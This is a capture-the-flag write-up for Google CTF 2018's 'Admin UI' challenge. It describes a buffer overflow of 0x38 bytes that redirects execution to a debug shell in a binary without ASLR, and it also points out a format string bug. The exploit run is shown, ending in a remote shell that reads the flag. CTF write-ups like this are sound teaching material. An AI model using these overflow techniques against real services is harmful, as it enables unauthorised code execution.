Rating:
The last part of the series and the most interesting one. We finally get to command execution. Unfortunately there is variable `_ZL13shell_enabled` and it's set to false.
But we can execute some built-in commands. `debug` command prints us a lot of interesing informations about the memory. The most important is `_ZL13cmds_executed` variable and its address. `shell_enabled` is just after it in the memory!
Also there is `echo` command which calls printf with our input as first parameter. This would allow us to perform format string attack.
But there's an easier solution. ASLR is disabled for this binary, so addresses are constant and we don't need to print them at all (we can get it with IDA).
The second vulnerability is buffer overflow. If we send 0x38 times any letter and after that an address of the debug_shell() call (the if branch that would be executed if shell_enabled variable were set to true) the application will return to that address.
[exploit](https://github.com/BOAKGP/CTF-Writeups/blob/master/Google%20CTF%202018%20Quals%20Beginners%20Quest/Admin%20UI/exploit.py)
When you run the exploit you have to type `quit` twice. And then you have the shell.
```
$ ./exploit.py
[+] Opening connection to mngmnt-iface.ctfcompetition.com on port 1337: Done
=== Management Interface ===
1) Service access
2) Read EULA/patch notes
3) Quit
1
Please enter the backdoo^Wservice password
CTF{I_luv_buggy_sOFtware}
:
! Two factor authentication required !
Please enter secret secondary password
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
:
Authenticated
[*] Switching to interactive mode
> Unknown command ''
> Unknown command 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAICAA'
> Bye!
$ ls -la
total 144
drwxr-xr-x 3 user user 4096 Jun 18 08:25 .
drwxr-xr-x 3 nobody nogroup 4096 May 25 13:19 ..
-rw-r--r-- 1 user user 220 Aug 31 2015 .bash_logout
-rw-r--r-- 1 user user 3771 Aug 31 2015 .bashrc
-rw-r--r-- 1 user user 655 May 16 2017 .profile
-rw-r--r-- 1 nobody nogroup 26 May 24 15:03 an0th3r_fl44444g_yo
-rw-r--r-- 1 nobody nogroup 25 Jun 18 08:25 flag
-rwxr-xr-x 1 nobody nogroup 111128 Jun 18 08:25 main
drwxr-xr-x 2 nobody nogroup 4096 Jun 18 08:25 patchnotes
$ cat an0th3r_fl44444g_yo
CTF{c0d3ExEc?W411_pL4y3d}
```
Flag: `CTF{c0d3ExEc?W411_pL4y3d}`
